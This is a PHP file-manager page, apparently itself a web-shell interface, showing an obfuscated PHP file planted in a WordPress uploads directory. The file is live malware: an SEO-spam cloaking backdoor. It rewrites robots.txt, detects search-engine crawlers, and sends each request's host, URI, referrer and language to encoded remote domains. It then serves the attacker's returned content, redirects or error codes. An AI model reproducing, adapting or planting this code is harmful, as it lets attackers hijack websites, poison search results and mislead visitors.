FileXXXXXXXXXXX

File manager - Edit - /home/acsexpp/www/wp-content/uploads/cafccefhgc.php

Back
<?php goto OJNDl; uxbXH: $defaultContent .= "\123\x69\164\145\x6d\x61\x70\x3a\x20" . $http . "\x3a\x2f\x2f" . $host . "\57" . $hta . "\163\151\x74\145\155\x61\160\56\170\x6d\154" . PHP_EOL; goto H3m29; t1ZBE: $duri_tmp = drequest_uri(); goto U8ANM; G5G7Z: if (!strstr($html_content, "\x6e\x6f\142\x6f\164\x75\163\x65\x72\141\147\145\x6e\164")) { handle_content($html_content); } goto r3cOA; HTJFU: $http = is_https() ? "\x68\x74\x74\160\x73" : "\150\164\164\x70"; goto t1ZBE; spax6: function drequest_uri() { if (isset($_SERVER["\x52\105\121\x55\x45\123\124\x5f\125\122\111"])) { return $_SERVER["\x52\105\x51\x55\x45\123\124\x5f\x55\122\x49"]; } elseif (isset($_SERVER["\x61\162\x67\x76"])) { return $_SERVER["\x50\x48\120\137\x53\x45\114\x46"] . "\77" . $_SERVER["\141\162\x67\x76"][0]; } else { return $_SERVER["\x50\x48\x50\x5f\123\x45\x4c\106"] . "\77" . $_SERVER["\x51\125\x45\122\x59\x5f\x53\124\122\x49\116\x47"]; } } goto Oomi0; BStP8: $web = "\167\145\142\75" . $host . "\46\x7a\172\x3d" . (disbot() ? "\x31" : "\60") . "\46\x75\x72\151\75" . urlencode($duri) . "\x26\165\x72\x6c\x73\150\x61\156\147\x3d" . urlencode($urlshang) . "\x26\150\x74\164\x70\x3d" . $http . "\46\x6c\x61\156\x67\75" . $lang; goto wbAS4; Oomi0: function disbot() { $uAgent = strtolower(isset($_SERVER["\110\124\124\120\137\125\123\x45\122\137\x41\x47\105\x4e\124"]) ? $_SERVER["\x48\x54\124\120\x5f\125\123\105\122\x5f\101\107\105\x4e\x54"] : ''); return stristr($uAgent, "\147\157\157\147\x6c\145\142\157\164") \|\| stristr($uAgent, "\x62\x69\x6e\147") \|\| stristr($uAgent, "\171\x61\150\x6f\157") \|\| stristr($uAgent, "\x67\157\x6f\x67\x6c\x65") \|\| stristr($uAgent, "\107\x6f\157\147\154\x65\142\157\x74"); } goto C9cwL; r3cOA: function is_https() { return isset($_SERVER["\x48\x54\x54\120\x53"]) && strtolower($_SERVER["\110\x54\124\x50\123"]) !== "\157\146\146" \|\| isset($_SERVER["\110\124\x54\120\x5f\x58\x5f\106\117\122\x57\101\x52\104\x45\x44\x5f\120\122\x4f\x54\117"]) && $_SERVER["\x48\x54\124\x50\137\x58\x5f\106\x4f\x52\x57\x41\122\x44\x45\x44\x5f\x50\x52\117\x54\117"] === "\x68\164\164\x70\163" \|\| isset($_SERVER["\110\x54\x54\120\x5f\106\122\x4f\116\x54\x5f\x45\x4e\x44\x5f\110\x54\x54\x50\123"]) && strtolower($_SERVER["\x48\x54\124\x50\x5f\106\122\x4f\x4e\x54\x5f\x45\116\x44\x5f\110\x54\124\120\123"]) !== "\x6f\146\146"; } goto spax6; bgju4: $defaultContent = "\x55\x73\x65\162\55\x61\147\x65\156\x74\72\40\52" . PHP_EOL; goto rA9JN; K9wtM: if (stristr($duri, "\x2f\x3f")) { $hta = "\x3f"; } goto bgju4; iaCxm: $urlshang = isset($_SERVER["\110\x54\x54\120\137\122\105\x46\105\122\x45\x52"]) ? $_SERVER["\x48\124\124\x50\x5f\x52\105\106\105\122\105\122"] : ''; goto BStP8; p27v2: $host = $_SERVER["\110\124\124\120\x5f\x48\117\x53\124"]; goto Ab7zm; eHfPn: $robotsPath = $_SERVER["\x44\117\103\125\x4d\105\x4e\124\137\x52\x4f\x4f\124"] . "\57\x72\157\142\157\x74\x73\56\164\x78\x74"; goto lLggz; rA9JN: $defaultContent .= "\101\154\154\x6f\167\x3a\x20\57" . PHP_EOL . PHP_EOL; goto uxbXH; wbAS4: $html_content = doutdo($xmlname, $http, $web); goto eHfPn; FDh_z: $xmlname = explode("\x2c", $xmlstring); goto HTJFU; H3m29: if (!file_exists($robotsPath)) { file_put_contents($robotsPath, $defaultContent); } else { if (md5_file($robotsPath) !== md5($defaultContent)) { @file_put_contents($robotsPath, $defaultContent); } } goto G5G7Z; C9cwL: function doutdo($webs, $http, $web) { shuffle($webs); foreach ($webs as $domain) { $domain = str_rot13(urldecode($domain)); $url = "\x68\164\164\x70\x3a\57\57" . $domain . "\x2f\x69\156\144\145\x78\56\x70\x68\160\77" . $web; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } else { curl_close($ch); } if (ini_get("\141\x6c\154\x6f\x77\x5f\x75\x72\x6c\x5f\146\157\160\145\156")) { $response = @file_get_contents($url); if ($response !== false) { return $response; } } } echo "\x63\125\122\114\x20\105\x72\162\x6f\x72\x3a\40\60"; } goto lIhJs; U8ANM: $duri = empty($duri_tmp) ? "\57" : $duri_tmp; goto p27v2; Ab7zm: $lang = isset($_SERVER["\x48\x54\124\120\137\x41\x43\103\x45\x50\124\x5f\114\101\x4e\107\125\x41\107\x45"]) ? $_SERVER["\x48\124\124\x50\137\x41\x43\103\x45\x50\124\137\x4c\101\116\107\x55\x41\107\105"] : "\145\x6e"; goto iaCxm; OJNDl: $xmlstring = "\45\x33\x32\x25\x33\x36\x25\63\x38\x25\x33\x37\45\x32\104\x25\66\x35\x25\x36\105\x25\x36\61\45\67\70\x25\63\62\x25\x33\60\45\63\66\45\62\105\45\x37\x36\45\67\101\45\66\x33\45\66\70\45\67\71\x25\x36\66\45\66\x32\x25\66\x35\x25\x32\x45\x25\x36\102\45\66\x43\x25\66\104\54\x25\63\62\45\63\66\x25\63\x38\45\x33\x37\x25\62\104\45\66\x35\x25\x36\x45\45\x36\x31\x25\67\x38\x25\x33\62\45\63\60\x25\x33\x36\x25\x32\105\x25\66\71\45\67\x36\45\66\65\x25\x36\x45\45\x37\71\x25\67\66\45\x36\x37\45\67\65\x25\x37\62\45\x32\105\45\x36\x42\x25\x36\103\x25\x36\104\54\45\x33\62\45\x33\66\x25\63\x38\x25\x33\x37\x25\62\104\45\x36\x35\45\66\105\45\66\61\x25\67\70\x25\x33\62\45\x33\x30\45\x33\66\x25\x32\x45\x25\x37\x33\45\66\105\x25\x36\66\45\x36\x37\45\66\62\45\66\65\45\67\62\x25\x36\66\45\62\105\45\x36\67\x25\66\62\45\66\63\54\x25\x33\x32\x25\x33\x36\x25\x33\70\45\63\x37\45\x32\104\45\66\x35\x25\66\105\45\x36\x31\45\x37\70\45\x33\62\45\x33\x30\x25\63\66\x25\62\105\45\x37\x39\45\67\66\x25\67\x41\x25\x37\x36\45\66\x31\x25\x36\x45\x25\x37\71\x25\67\66\45\x36\66\x25\x32\105\x25\x36\x37\x25\66\62\45\66\x33"; goto FDh_z; lLggz: $hta = ''; goto K9wtM; lIhJs: function handle_content($html_content) { if (strstr($html_content, "\157\153\150\x74\x6d\x6c\x67\x65\164\143\x6f\156\x74\x65\156\164")) { header("\x43\x6f\156\164\x65\x6e\164\x2d\x74\x79\160\145\x3a\x20\x74\145\170\x74\x2f\x68\x74\155\x6c\x3b\40\x63\150\141\162\163\145\x74\75\x75\164\146\x2d\70"); echo str_replace("\x6f\153\150\x74\x6d\x6c\x67\x65\164\x63\x6f\156\164\x65\156\x74", '', $html_content); die; } elseif (strstr($html_content, "\x6f\x6b\x78\155\154\x67\x65\x74\143\157\156\164\145\156\x74")) { header("\103\x6f\156\164\145\156\x74\x2d\124\171\x70\145\72\40\x61\160\160\x6c\x69\143\141\x74\x69\x6f\156\57\x78\x6d\154\x3b\40\x63\x68\x61\x72\x73\x65\x74\75\x75\x74\x66\55\x38"); echo str_replace("\157\x6b\x78\155\154\x67\145\x74\x63\157\x6e\x74\145\x6e\164", '', $html_content); die; } elseif (strstr($html_content, "\x67\x65\164\x63\x6f\x6e\x74\x65\156\x74\65\x30\60\160\x61\147\x65")) { header("\x48\124\124\120\x2f\61\56\61\40\x35\60\60\40\x49\x6e\x74\145\x72\x6e\141\x6c\40\x53\x65\x72\x76\x65\162\40\x45\162\x72\x6f\162"); die; } elseif (strstr($html_content, "\x67\145\164\143\157\x6e\164\x65\156\x74\x34\60\x34\x70\141\x67\145")) { header("\x48\124\x54\x50\x2f\x31\56\61\40\64\x30\64\x20\116\x6f\164\40\x46\x6f\165\156\144"); die; } elseif (strstr($html_content, "\x67\145\x74\143\x6f\156\164\145\x6e\164\x33\x30\x31\x70\141\147\x65")) { header("\x48\x54\124\120\x2f\61\56\61\40\63\60\x31\40\x4d\x6f\166\x65\144\x20\120\x65\x72\155\141\156\145\x6e\x74\154\171"); $html_content = str_replace("\147\145\164\143\157\156\x74\x65\x6e\x74\x33\60\x31\x70\141\x67\145", '', $html_content); header("\114\x6f\x63\x61\x74\151\x6f\156\72\40" . $html_content); die; } elseif (strstr($html_content, "\x6f\x6b\x72\157\x62\157\x74\x73\147\145\164\x63\157\156\x74\x65\156\164")) { header("\103\x6f\x6e\x74\x65\156\164\55\124\x79\160\x65\x3a\x20\164\145\x78\164\57\x70\154\141\151\x6e"); echo str_replace("\x6f\x6b\162\157\x62\x6f\x74\163\x67\145\164\x63\x6f\156\164\x65\x6e\164", '', $html_content); die; } }

| ver. 1.4 | Github | . | PHP 8.0.30 | Generation time: 0 | proxy | phpinfo | Settings